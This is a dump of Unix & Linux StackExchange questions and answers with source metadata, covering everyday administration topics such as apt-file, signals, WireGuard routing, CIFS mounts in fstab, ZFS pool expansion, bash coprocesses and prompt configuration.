} |
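A short demonstration of a few of these classes with any POSIX grep:
printf 'a 1!\n' | grep -o '[[:alnum:]]'   # prints a and 1
printf 'a 1!\n' | grep -o '[[:punct:]]'   # prints !
printf 'a\tb\n' | grep -c '[[:blank:]]'   # counts lines containing a space/tab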
530,413 | If the package command-not-found is installed and a user tries to run a command which is not present on the system, a suggestion is printed with the name of the package which provides the executable. Is there a command with the same functionality but which takes the name of an executable as an argument? Edit: I have read How to find out which (not installed) Debian package a file belongs to? but none of the suggestions present a command which gives an unambiguous result like command-not-found . | You can use command-not-found itself: command-not-found --ignore-installed ls will tell you which package contains the ls command. ( --ignore-installed avoids taking into account installed packages, and in particular ensures that the command isn’t run immediately if it’s already installed.) Alternatively, you can use apt-file : apt-file search bin/ls will list all packages containing a file whose path contains “bin/ls”. You can filter this to match only ls : apt-file search bin/ls | grep bin/ls$ | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/530413",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/36718/"
]
} |
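The one-time setup the apt-file approach above assumes, on Debian/Ubuntu:
sudo apt install apt-file
sudo apt-file update                      # fetch the file lists before the first search
apt-file search bin/ls | grep 'bin/ls$'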
530,537 | I want to append NoDisplay=true to a .desktop file, but only if the entry doesn't exist. I do this the following way: grep -q 'NoDisplay=true' '/usr/share/applications/yelp.desktop' || bash -c 'echo "NoDisplay=true" >> /usr/share/applications/yelp.desktop' I was wondering if there is a shorter one-liner for the same operation? I use this command in a bash script and had to use the command "bash -c". | If you have GNU sed , it's fairly simple: sed -zi '/NoDisplay=true/!s/$/\nNoDisplay=true/' file Option -z treats the whole file at once in the pattern space (not recommended for huge files). If the setting is not ( ! ) found, append it at the end with an embedded newline. Note: -i , -z and \n in the replacement string are not standard, so this is not portable. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530537",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/250156/"
]
} |
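For comparison, a sketch of the question's grep approach tightened up; -x matches the whole line, -F takes the pattern literally, and no bash -c wrapper is needed inside a script:
f=/usr/share/applications/yelp.desktop
grep -qxF 'NoDisplay=true' "$f" || echo 'NoDisplay=true' >> "$f"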
530,575 | I've tried to search for a solution, but all I found was how to pin processes to a CPU using taskset or sched_setaffinity. But it looks like this won't give the process exclusive access to the CPU, i.e., the scheduler may assign some other process to this CPU. Is there any way or command by which we can ensure that the CPU is dedicated to the process? With taskset we can make sure a particular process runs only on a particular CPU, but I want it the other way too, where the CPU is bound to that process. I've found questions like How to allocate a process specific amount of CPU power? and How to limit a process to one CPU core in Linux? but they got marked as duplicates of How can I set the processor affinity of a process on Linux? which is not what I want. | You need to exclude one CPU from overall scheduling; afterwards you can assign the process to it via taskset as you already found out. To exclude a CPU, add the boot parameter isolcpus=N The number (N) is 0-based. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530575",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/312593/"
]
} |
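A sketch of the whole sequence on a GRUB-based, Debian-style system; the CPU number 3 is a placeholder and other distributions regenerate the GRUB config differently:
# 1. append the parameter to GRUB_CMDLINE_LINUX_DEFAULT in /etc/default/grub:
#    GRUB_CMDLINE_LINUX_DEFAULT="quiet isolcpus=3"
sudo update-grub   # then reboot
# 2. pin the process to the isolated CPU
taskset -c 3 ./my_program
# 3. confirm the kernel saw the parameter
cat /sys/devices/system/cpu/isolated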
530,602 | I'm testing Debian 10 in a VM to check if I can use it for my stream servers (headless minimal netinstall). Why does pip3 install, e.g. supervisor, in ~/.local ? I did read the release notes but couldn't find anything about the .local folder. As far as I understand, I will run into trouble with PATH , and there are a lot of other reasons to install it to /usr/local rather than ~/.local . How can I avoid this, or is this the way it is meant to be in Debian? | The following warning in packaging.python.org may answer your question: Warning Recent Debian/Ubuntu versions have modified pip to use the “ User Scheme ” by default, which is a significant behavior change that can be surprising to some users. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530602",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/346243/"
]
} |
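Two ways to see where things land, using plain pip/python features; supervisor is just the example package from the question:
python3 -m site --user-base             # prints the ~/.local prefix on an affected system
pip3 show -f supervisor | head          # the Location: line reveals the install dir
export PATH="$HOME/.local/bin:$PATH"    # make user-scheme scripts reachable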
530,682 | I've realised recently that the kill utility can send any signal I want, so when I need to SIGKILL a process (when it's hanging or something), I send a SIGSEGV instead for a bit of a laugh ( kill -11 instead of kill -9 .) However, I don't know if this is bad practice. So, is kill -11 more dangerous than kill -9 ? If so, how? | The SIGSEGV signal is sent by the kernel to a process that has made an invalid virtual memory reference (segmentation fault). One way sending a SIGSEGV could be more "dangerous" is if you kill a process on a filesystem that is low on space. The default action when a process receives a SIGSEGV is to dump core to a file then terminate. The core file could be quite large, depending on the process, and could fill up the filesystem. As @Janka has already mentioned, you can write code to tell your program how you want it to handle a SIGSEGV signal. You can't trap a SIGKILL or a SIGSTOP . I would suggest using a SIGKILL when you only want to terminate a process (a SIGSTOP only suspends it). Using a SIGSEGV usually won't have bad repercussions, but it's possible the process you want to terminate could handle a SIGSEGV in a way you don't expect. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530682",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/332140/"
]
} |
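A small experiment illustrating the difference, run against a throwaway process; whether a core file actually appears also depends on the system's core_pattern setting:

    ulimit -c unlimited                # allow core dumps in this shell
    sleep 1000 & victim=$!
    kill -SEGV "$victim"               # default disposition: terminate and dump core
    wait "$victim"; echo "status $?"   # 139 = 128 + 11 (SIGSEGV)

    sleep 1000 & victim=$!
    kill -KILL "$victim"               # terminates immediately, cannot be caught, no core
    wait "$victim"; echo "status $?"   # 137 = 128 + 9 (SIGKILL)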
530,788 | I'm running Arch Linux with simple terminal using the Adobe Source Code Pro font. My locale is correctly set to LANG=en_US.UTF-8 . I want to print Unicode characters representing playing cards to my terminal. I'm using Wikipedia for reference . The Unicode characters for card suits work fine. For example, issuing $ printf "\u2660" prints a black spade to the screen. However, I'm having trouble with specific playing cards. Issuing $ printf "\u1F0A1" prints the symbol Ἂ1 instead of the ace of spades . What's going wrong? This problem persists across several terminals (urxvt, xterm, termite) and every font I've tried (DejaVu, Inconsolata). | help printf defers to printf(1) for the escape sequences interpreted, and the docs for GNU printf say: printf interprets two character syntaxes introduced in ISO C 99: \u for 16-bit Unicode (ISO/IEC 10646) characters, specified as four hexadecimal digits hhhh , and \U for 32-bit Unicode characters, specified as eight hexadecimal digits hhhhhhhh . printf outputs the Unicode characters according to the LC_CTYPE locale. Unicode characters in the ranges U+0000…U+009F, U+D800…U+DFFF cannot be specified by this syntax, except for U+0024 ($), U+0040 (@), and U+0060 (`). Something similar is specified in the Bash manual for ANSI C Quoting and echo : \uHHHH the Unicode (ISO/IEC 10646) character whose value is the hexadecimal value HHHH (one to four hex digits) \UHHHHHHHH the Unicode (ISO/IEC 10646) character whose value is the hexadecimal value HHHHHHHH (one to eight hex digits) In short: \u is not for 5 hex digits. It's \U : # printf "\u2660 \u1F0A1 \U1F0A1\n"♠ Ἂ1 🂡 A loop printing the whole suit follows this record. | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/530788",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/92703/"
]
} |
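Building on that, a small loop that prints the whole spades row of the Playing Cards block (U+1F0A1 through U+1F0AE); it assumes a bash new enough to support \U and a font that has the glyphs:

    for ((cp = 0x1F0A1; cp <= 0x1F0AE; cp++)); do
        # build the 8-digit form that \U expects, then let printf expand it
        printf "\U$(printf '%08X' "$cp") "
    done
    printf '\n'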
530,790 | I am running CentOS 7.6, and I installed a test Wireguard VPN server. The whole installation and configuration is pretty easy, at least according to the documentation. What I did: I installed wireguard-tools, wireguard-dkms and linux-headers; next, I generated the private and public key of the server, and wrote the configuration of the server as: [Interface]Address = 10.7.0.1/24ListenPort = 34777PrivateKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=[Peer]PublicKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=AllowedIPs = 10.7.0.2/32[Peer]PublicKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=AllowedIPs = 10.7.0.3/32[Peer]PublicKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=AllowedIPs = 10.7.0.4/32[Peer]PublicKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=AllowedIPs = 10.7.0.5/32 From the server side I opened port 34777 udp on the firewall, and set sysctl -w net.ipv4.ip_forward (to enable forwarding), as this server is supposed to forward traffic from clients to other servers in the subnet of the VPN server. Now let's imagine that the public IP of this server is 11.11.11.11/23. On the client side, the configuration looks like this: [Interface]Address = 10.7.0.4/24PrivateKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=[Peer]PublicKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=AllowedIPs = 10.7.0.1/32,11.11.11.0/23 (for having a route to the 11.11.11.0/23 subnet) or 0.0.0.0/0Endpoint = 11.11.11.11:34777 Now, 0.0.0.0/0 means that I will forward all traffic to my VPN (it's not mandatory; it can be a split tunnel). What I don't understand: when I connect, I can ping the interface of the server, 10.7.0.1, but I cannot ping anything from the network 11.11.11.0/23. Since network 11.11.11.0/23 is public, there is no NAT. Also, on the CentOS box I use firewalld instead of iptables. How and why can't I see the internal network behind the tunneled interface? Picture of how the setup looks: (diagram omitted) P.S. On the picture, between host A and the Wireguard server, there is another linux router (a main router), so please keep that in mind. | After a lot of trial and error, and brainstorming with the wireguard IRC channel guys, it turned out I had forgotten to add a static route for 10.7.0.0/24 on each server behind wireguard. The ping reaches the server, but does not return, as the server does not know where to send the echo-reply: ip route add 10.7.0.0/24 via 11.11.11.11 dev eth0 (main device for communication) For me, problem solved ;-) A sketch of the verification and persistence steps follows this record. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530790",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/102001/"
]
} |
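A sketch of verifying and persisting the fix; the addresses match the question's hypothetical 11.11.11.0/23 setup, and the persistence step assumes the host behind the server also uses RHEL-style network scripts:

    # on a host behind the WireGuard server (e.g. host A):
    ip route add 10.7.0.0/24 via 11.11.11.11 dev eth0
    ip route get 10.7.0.4        # confirm the echo-reply would now take that route

    # make it survive reboots:
    echo '10.7.0.0/24 via 11.11.11.11 dev eth0' | sudo tee -a /etc/sysconfig/network-scripts/route-eth0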
530,794 | My laptop is an Acer predator helios 300 with intel i7-7700hq and an NVIDIA GTX 1050ti. It had a 128GB NVME SSD and 1TB hard disk. I had dual boot on it with fedora 29 installed on the SSD and Mint Tessa installed on the Hard Disk. I deleted all the fedora partitions including the EFI partition from within mint using GParted. After that even Mint did not boot up. I tried to install Deepin OS 15.10 on the SSD and freed all the space on the HDD in the process. While the installation completed without an issue, it just freezes completely whenever I hit shutdown or restart. The exact same thing happens with Manjaro Deepin 18.0.2 as well as Elementary OS 5.0 Juno. I tried setting nouveau.modeset=0 , acpi=off , acpi=noirq in /etc/default/grub and similar solutions people suggesting online. None of them worked. I then replaced the HDD with a Samsung 860 Evo 250 GB SATA SSD and tried to install Ubuntu 18.04 on it. Exact same thing as the previous three. Clean installation but freezes on reboot/shutdown. 1) I saw people claiming this to be a display driver issue. I am not sure but this seems unlikely as I had faced issues with the nouveau drivers earlier and those mostly led to blank screens on startup. I may be wrong here though. 2) This may be an issue with the UEFI bootloader as on rare occasions when the system does not freeze on pressing shut down immediately, it stops at Problem loading UEFI:db X.509 certificate (-65) 3) I tried some of the UEFI related options like enabling and disabling secure boot. To no avail. Any help is very very welcome. I am not able to do any work as I don't want to hard shut down my laptop again and again. | I was fighting this issue for 3 days, tried all of the above options but none of them helped me. But I solved it! So, in my case the issue was because of UEFI boot (probably because laptop is very old: lenovo ideapad z570 and UEFI implementation is buggy). SOLUTION: I just added noefi into the kernel options and my laptop started shutting down in a normal way. sudo vim /etc/default/grub GRUB_CMDLINE_LINUX_DEFAULT="splash quiet noefi" Update grub (for ubuntu : sudo update-grub ) PS: It works on any kernel ( 4.19 or 5.2 ). Tested it on nvidia-390xx | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530794",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/362895/"
]
} |
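A quick sanity check that the noefi option from the answer above actually reached the kernel; a sketch to run after update-grub and a reboot:

    grep -wo noefi /proc/cmdline && echo "noefi is active"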
530,818 | Problem pytesseract.image_to_string() takes too much time when I run the script through supervisord, but executes almost instantaneously when run directly in a shell (on the same server and simultaneously with the supervisor scripts). Apart from taking too much time, the processes are also showing high CPU usage. Time taken by pytesseract.image_to_string() when run via Supervisord: ~30s Time taken by pytesseract.image_to_string() when run via Bash: 0.1s This problem only occurs if there are a lot of processes executing pytesseract.image_to_string() being run via supervisord (around 22 instances). If I reduce the number of instances (to around 10), the scripts executed via supervisord also run smoothly. System Information OS: Ubuntu 18.04.2 LTS (bionic) Supervisord: Version 3.3.1 Tesseract: Version 4.0.0-beta.1 Python: Version 3.6 PyTesseract: Version 0.2.5 ulimit -a core file size (blocks, -c) 0data seg size (kbytes, -d) unlimitedscheduling priority (-e) 0file size (blocks, -f) unlimitedpending signals (-i) 127357max locked memory (kbytes, -l) 16384max memory size (kbytes, -m) unlimitedopen files (-n) 8096pipe size (512 bytes, -p) 8POSIX message queues (bytes, -q) 819200real-time priority (-r) 0stack size (kbytes, -s) 8192cpu time (seconds, -t) unlimitedmax user processes (-u) 127357virtual memory (kbytes, -v) unlimitedfile locks (-x) unlimited Let me know if you need any more information. Edit 1 (or I know what's NOT the source of this problem) I am fairly certain that it is not an issue with Supervisord. When I run one instance from an ssh shell, the function ( pytesseract.image_to_string() ) is executed smoothly (i.e. takes only 0.1s), while there are 10 instances being run via Supervisord. When I start another instance from a new ssh shell, both instances (the ones started from ssh) run smoothly most of the time. When I start yet another instance from a new ssh shell, all three instances start choking, taking around 10s to execute the function. This time keeps increasing as I add more instances via the shell. So the problem can be replicated even with a shell. More Information I ran the program with strace -T -f but I could not figure out what exactly is causing the spike in time. For a function call that takes 1s Top 10 system calls sorted by time taken1.504530 [pid 29921] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 301660.503915 [pid 29932] <... select resumed> ) = 0 (Timeout)0.503472 [pid 29932] <... select resumed> ) = 0 (Timeout)0.500524 [pid 29933] <... select resumed> ) = 0 (Timeout)0.500515 [pid 29933] <... select resumed> ) = 0 (Timeout)0.500514 [pid 29932] <... select resumed> ) = 0 (Timeout)0.500512 [pid 29933] <... select resumed> ) = 0 (Timeout)0.069869 [pid 30169] <... futex resumed> ) = ? ERESTARTSYS (To be restarted if SA_RESTART is set)0.035989 [pid 30167] <... futex resumed> ) = 00.016002 [pid 30168] <... futex resumed> ) = 0 For a function call that takes 9s Top 10 system calls sorted by time taken9.795787 [pid 29921] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 301060.515960 [pid 29933] <... select resumed> ) = 0 (Timeout)0.511955 [pid 29933] <... select resumed> ) = 0 (Timeout)0.507979 [pid 29932] <... select resumed> ) = 0 (Timeout)0.507968 [pid 29932] <... select resumed> ) = 0 (Timeout)0.505257 [pid 29932] <... select resumed> ) = 0 (Timeout)0.503988 [pid 29932] <... select resumed> ) = 0 (Timeout)0.503978 [pid 29932] <... select resumed> ) = 0 (Timeout)0.503975 [pid 29932] <... select resumed> ) = 0 (Timeout)0.503974 [pid 29932] <... select resumed> ) = 0 (Timeout) | Disabling multiprocessing in tesseract fixed the issue. It can be done by setting OMP_THREAD_LIMIT=1 in the environment. See https://github.com/tesseract-ocr/tesseract/issues/898#issuecomment-315202167 A sample supervisord snippet follows this record. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530818",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/125892/"
]
} |
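One place to apply that setting is directly in the supervisord program section; a sketch, with a hypothetical program name and command:

    ; /etc/supervisor/conf.d/ocr.conf
    [program:ocr_worker]
    command=/usr/bin/python3 /opt/ocr/worker.py
    environment=OMP_THREAD_LIMIT="1"
    numprocs=22
    process_name=%(program_name)s_%(process_num)02d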
530,900 | On all the Linuxes that I've tried before, whenever one puts something in /etc/fstab it gets automatically mounted when the machine is restarted, however after installing Debian 10, the same mechanism doesn't seem to work on it. The fstab entry looks like this: //hostname/Share /Share cifs _netdev,dir_mode=0777,file_mode=0777,username=<NAME>,password=<PASSWORD>,rw,uid=1000,gid=1000 0 0 After restart, the mount folder is empty and is not listed in the mounts. I looked at dmesg, and these are the only mentions of mounts or cifs: [ 3.067180] FS-Cache: Netfs 'cifs' registered for caching[ 3.067243] Key type cifs.spnego registered[ 3.067247] Key type cifs.idmap registered[ 3.068769] No dialect specified on mount. Default has changed to a more secure dialect, SMB2.1 or later (e.g. SMB3), from CIFS (SMB1). To use the less secure SMB1 dialect to access old servers which do not support SMB3 (or SMB2.1) specify vers=1.0 on mount. That dialect message doesn't come up at every restart, though. I had to add sudo mount -a to crontab @restart to get them to show up, but is there a more "proper" way for Debian 10 to recognize fstab the way other Debians do? | systemd will use the contents of the traditional /etc/fstab file to dynamically create "mount units". You'll need to check the status of the appropriate mount unit to see why it failed: please run systemctl status Share.mount . The most likely reason is that NetBIOS name resolution isn't available (i.e. Samba's nmbd isn't running yet) when the mount attempt happens, as suggested in the appropriate Debian Wiki page . See man systemd.mount for systemd-specific mount options you can use in /etc/fstab . For example, you might use x-systemd.automount as a workaround: with it, systemd should mount the filesystem automatically the first time something attempts to use it. Also, check systemctl status network-online.target : if you have a static network configuration, the system might be failing to detect when the network connection is properly "online", and attempt to mount network filesystems too early as a result. Check the new WAIT_ONLINE_IFACE= and WAIT_ONLINE_METHOD= settings in /etc/default/networking configuration file for possible ways to make the network online detection more reliable. Also, to silence the dialect message, you should add vers=N.N to your mount options. See man mount.cifs for the list of N.N values available and the corresponding Windows versions. If the server is at least Windows Server 2008R2, you can use vers=2.1 . The old protocol version vers=1.0 was vulnerable to the attack of the infamous WannaCry ransomware in year 2017, and it could not be fixed, so all up-to-date OSs should by now be programmed to hate that version and not use it unless specifically asked to. (If your server still cannot support any of the newer protocol versions, then that server needs to be upgraded.) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530900",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/222288/"
]
} |
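Putting those suggestions together, a sketch of an updated fstab line; vers=3.0 assumes the server is modern enough, and the share details are the question's own placeholders:

    //hostname/Share /Share cifs _netdev,x-systemd.automount,vers=3.0,dir_mode=0777,file_mode=0777,username=<NAME>,password=<PASSWORD>,rw,uid=1000,gid=1000 0 0

    sudo systemctl daemon-reload   # regenerate the mount/automount units
    ls /Share                      # first access should trigger the mount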
530,968 | I am planning a storage server where users will store up to 20 TB of data. Since I have had good experiences with ZFS on Linux, I would like to use that. However, I know that the amount of data will grow by several 100 GB per year, so at some point, I will need to increase my pool size. Since there is so much data, I am afraid that it will be quite a hassle to completely destroy the zpool and recreate it; so I wonder whether it would be possible to increase the pool capacity by adding more disks and keeping the existing ones. The pool will be RAIDZ-1 at least. Or is it true that it will be necessary to remove one disk after another and replace it with a larger one? No, I cannot believe that. How do larger servers than mine handle the increasing demand for more storage capacity? | There are basically two ways of growing a ZFS pool. Add more vdevs This is what user1133275 is suggesting in their answer . It's done with zpool add (which has basically the same syntax as zpool create does for specifying storage), and it works well for what it does. ZFS won't rebalance your stored data automatically, but it will start to write any new data to the new vdevs until the new vdev has about the same usage as the existing one(s). Once you've added a vdev to a pool, you basically cannot remove it without recreating the pool from scratch. All vdevs in a pool need to be above their respective redundancy thresholds for the pool to be importable. In other words, every vdev needs to be at least DEGRADED for the pool to function. Replace disks with larger ones This is what you're discussing in your question. It's the normal way of growing a ZFS pool when you have a pool layout that you are happy with. To replace a device with a new one, the new device needs to be at least as large as the old one. Operationally, you'd hook up the new disk along with the old, and then zpool replace the old disk with the new one. (This creates a temporary replacing device which becomes a parent to the old and new disk; when the resilver completes, the replacing device is removed from the device tree and it looks like the new device was there all along.) Once the resilver completes, the old disk can be removed from the system. Once all disks in a vdev are replaced by larger ones, you can expand the pool by running zpool online -e or by having the autoexpand property set to on (though I wouldn't really recommend the latter; pool expansion should be a conscious decision). So which way is better? That basically depends on your pool. As mentioned, the downside to having multiple vdevs is that they all need to be functional, so by adding vdevs you are actually, in a sense, reducing your safety margin. The upside, though, is that it's much easier to grow the pool piecemeal. Replacing devices in-place is basically the opposite; you don't need to keep as many vdevs functioning, but it isn't as easy to grow a pool piecemeal. For me, frankly, assuming for a second that you're using rotational hard disks (since this seems like bulk storage), 20 TB is still well within reason for a single vdev pool. My suggestion in your situation would be to get six drives of the 8 TB variety, and to set those up in a single raidz2 vdev. Doing so gives you a net storage capacity of around 32 TB, thus leaving you initially with about 35% free, and the ability to lose any two drives before any of your data is at significant risk. You could also consider running eight 6 TB drives for a net storage capacity of around 36 TB and starting out at 45% free. (I'd consider 6-8 drives to be slightly on the large end for raidz1, but fine for raidz2.) Then plan to replace those drives either on a 4-5 year schedule (due to wear) or whenever the pool goes above about 80% full (because ZFS is much, much happier when it has good headroom). If your figures are accurate, you should be replacing those drives due to wear well before your pool starts getting full, while still allowing for a reasonable amount of unexpected growth in storage needs. When you replace the drives, you can decide whether you're happy with the pool size you've got based on then-current usage, or if you want to get larger drives and expand the pool. A sketch of both growth paths follows this record. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530968",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/171284/"
]
} |
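A sketch of the two growth paths, with hypothetical pool and device names:

    # path 1: add a second six-disk raidz2 vdev to the pool "tank"
    zpool add tank raidz2 sdg sdh sdi sdj sdk sdl

    # path 2: replace disks in place with larger ones, one at a time
    zpool replace tank sda sdm   # wait for the resilver before doing the next disk
    zpool status tank            # confirm the resilver finished
    zpool online -e tank sdm     # expand once every disk in the vdev is larger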
531,171 | On his web page about the self-pipe trick , Dan Bernstein explains a race condition with select() and signals, offers a workaround and concludes that Of course, the Right Thing would be to have fork() return a file descriptor, not a process ID. What does he mean by this -- is it something about being able to select() on child processes to handle their state changes instead of having to use a signal handler to get notified of those state changes? | The problem is described there in your source: select() should be interrupted by signals like SIGCHLD , but in some cases it doesn't work that well. So the workaround is to have the signal handler write to a pipe, which is then watched by select() . Watching file descriptors is what select() is for, so that works around the problem. The workaround essentially turns the signal event into a file descriptor event. If fork() just returned an fd in the first place, the workaround would not be required, as that fd could then presumably be used directly with select() . So yes, your description in the last paragraph seems right to me. Another reason that an fd (or some other kind of kernel handle) would be better than a plain process id number is that PIDs can get reused after the process dies. That can be a problem in some cases when sending signals to processes: it might not be possible to know for sure that the process is the one you think it is, and not another one reusing the same PID. (Though I think this shouldn't be a problem when sending signals to a child process, since the parent has to run wait() on the child for its PID to be released.) | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/531171",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/169677/"
]
} |
531,198 | The intent of the test script 1 below is to start an "outer" coprocess (running seq 3 ), read from this coprocess in a while -loop, and for each line read, print a line identifying the current iteration of the outer loop, start an "inner" coprocess (also running seq , with new arguments), read from this inner coprocess in a nested while loop, and then clean up this inner coprocess. The nested while loop prints some output for each line it reads from the inner coprocess. #!/bin/bash# filename: coproctest.shPATH=/bin:/usr/bincoproc OUTER { seq 3; }SAVED_OUTER_PID="${OUTER_PID}"exec {OUTER_READER}<&"${OUTER[0]}"while IFS= read -r -u "${OUTER_READER}" OUTER_INDEX; do printf -- '%d\n' "${OUTER_INDEX}" START=$(( OUTER_INDEX * 1000000 )) FINISH=$(( START + OUTER_INDEX )) # ( coproc INNER { seq "${START}" "${FINISH}"; } SAVED_INNER_PID="${INNER_PID}" exec {INNER_READER}<&"{INNER[0]}" while IFS= read -r -u "${INNER_READER}" INNER_INDEX; do printf -- ' %d\n' "${INNER_INDEX}" done exec {INNER_READER}<&- wait "${SAVED_INNER_PID}" # )doneexec {OUTER_READER}<&-wait "${SAVED_OUTER_PID}" When I run this script, this is the output I get: % ./coproctest.sh1./coproctest.sh: line 30: warning: execute_coproc: coproc [12523:OUTER] still exists./coproctest.sh: line 19: INNER_READER: ambiguous redirect./coproctest.sh: line 21: read: : invalid file descriptor specification./coproctest.sh: line 25: INNER_READER: ambiguous redirect2./coproctest.sh: line 19: INNER_READER: ambiguous redirect./coproctest.sh: line 21: read: : invalid file descriptor specification./coproctest.sh: line 25: INNER_READER: ambiguous redirect3./coproctest.sh: line 19: INNER_READER: ambiguous redirect./coproctest.sh: line 21: read: : invalid file descriptor specification./coproctest.sh: line 25: INNER_READER: ambiguous redirect I get pretty much the same output if I uncomment the two commented lines. Q1: Is it possible to have multiple coprocesses running at the same time? Q2: If so, how should the script above be modified to achieve the desired output? 1 I've only recently started to work with coprocesses, and there is still a lot I don't understand. As a result, this script almost certainly contains incorrect, awkward, or unnecessary code. Please feel free to comment on and/or fix these weaknesses in your responses. | From the "BUGS" section at the very end of the bash manual: There may be only one active coprocess at a time. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/531198",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/10618/"
]
} |
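Given that limitation, one workaround is plain process substitution with explicit fds, which is close to what the script's fd juggling already does; a sketch producing the intended nested output:

    exec {OUTER_READER}< <(seq 3)
    while IFS= read -r -u "$OUTER_READER" i; do
        printf '%d\n' "$i"
        exec {INNER_READER}< <(seq "$((i * 1000000))" "$((i * 1000000 + i))")
        while IFS= read -r -u "$INNER_READER" j; do
            printf '  %d\n' "$j"
        done
        exec {INNER_READER}<&-   # close before the next iteration reallocates it
    done
    exec {OUTER_READER}<&-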
531,294 | I'm using a function to dynamically generate output for PS1 . There are a couple statements that check if node and package.json exist, and if git and .git folder exist to display node version or the git branch. If none exist it just outputs the User$. The problem is when user goes into another folder where none of the conditions are met the prompt is not updating. It's like conditions are cached or smth function displayPS1() { MESSAGE=""; GRAY_BACK="\[\e[100;97m\]"; GREEN_BACK="\[\e[100;42m\]"; GREEN_FORE="\[\e[32;1m\]"; CYAN_BACK="\[\e[100;46m\]"; CYAN_FORE="\[\e[36;1m\]"; RESET="\[\e[0m\]"; if hash node 2>/dev/null && [ -e package.json ]; then NODE='$(node -v | sed "s/\(v[0-9]*\)\(\.[0-9]*\.[0-9]*\)/\1/g")'; MESSAGE="${GRAY_BACK} node ${GREEN_BACK} $NODE ${RESET} User${GREEN_FORE}$ ${RESET}"; elif hash git 2>/dev/null && [ -d .git ]; then BRANCH='$(cat .git/HEAD | sed "s/ref:[[:space:]]refs\/heads\///")'; MESSAGE="${GRAY_BACK} git ${CYAN_BACK} $BRANCH ${RESET} User${CYAN_FORE}$ ${RESET}"; else MESSAGE="User${CYAN_FORE}$ ${RESET}"; fi echo "$MESSAGE";}export PS1=$(displayPS1); | export PS1=$(displayPS1); This will run displayPS1 , and the if statements within once , assigning the result to the prompt. The conditions won't be processed again after that. Instead, put the function call in PROMPT_COMMAND , so it gets called every time the prompt is going to be printed. So either PROMPT_COMMAND='PS1=$(displayPS1)' or perhaps rather PROMPT_COMMAND=setPS1 and make setPS1 a function that sets PS1 itself. (Getting rid of the command substitution saves a fork from the subshell invocation every time the prompt is changed.) | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/531294",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/363363/"
]
} |
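A trimmed sketch of the function-based variant suggested above, keeping only the logic that picks the prompt (colors omitted):

    setPS1() {
        if [ -e package.json ] && hash node 2>/dev/null; then
            PS1="node $(node -v | sed 's/\(v[0-9]*\).*/\1/') \$ "
        elif [ -d .git ]; then
            PS1="git $(sed 's|ref: refs/heads/||' .git/HEAD) \$ "
        else
            PS1='User$ '
        fi
    }
    PROMPT_COMMAND=setPS1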
531,314 | I was able to encrypt a directory so that it can not be deleted. And I encrypted the file in the folder. But then I was able to delete the encrypted file in the encrypted folder, in which case, encrypting them was pointless b/c it did not save my file from being deleted. To encrypt the folder, I used "sudo mount -t decryptfs ~/file ~/file". During the process it asked me if I wanted a clear text passthrough and if I wanted to encrypt the file (I think that's what it was), but the program would only work if I put yes for #1, and no for #2. To encrypt the file I used "gpg -c filename". There must be a way to prevent the file from being deleted, or, not even being able to get to the file since I would think an encrypted folder would protect the contents, otherwise, what's the point. I looked for another way to encrypt, found vera-crypt, but that is for the entire hdd, apparently. Is there a simple solution here, or should I look for a completely different method for encrypting the directory? Thank you. | | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/531314",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/356799/"
]
} |
531,322 | I want to cheat a program to use a special /etc/resolv.conf file, that in turn will force it to use a nonstandard nameserver. The obvious solution is to recreate the whole filesystem except one file and use a chroot. But maybe there is a simpler hack for doing this. how to change a file's content for a specific process only? gives solutions that work in many cases, but not for /etc/resolv.conf : LD_PRELOAD doesn't catch when the resolver inside libc opens /etc/resolv.conf , and a bind mount doesn't work to override a symbolic link (if the link target is missing or when the link is changed afterwards). EDIT: A relevant question is How do I mount a file on top of a broken symbolic link? and there is no universal solution found | | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/531322",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/174081/"
]
} |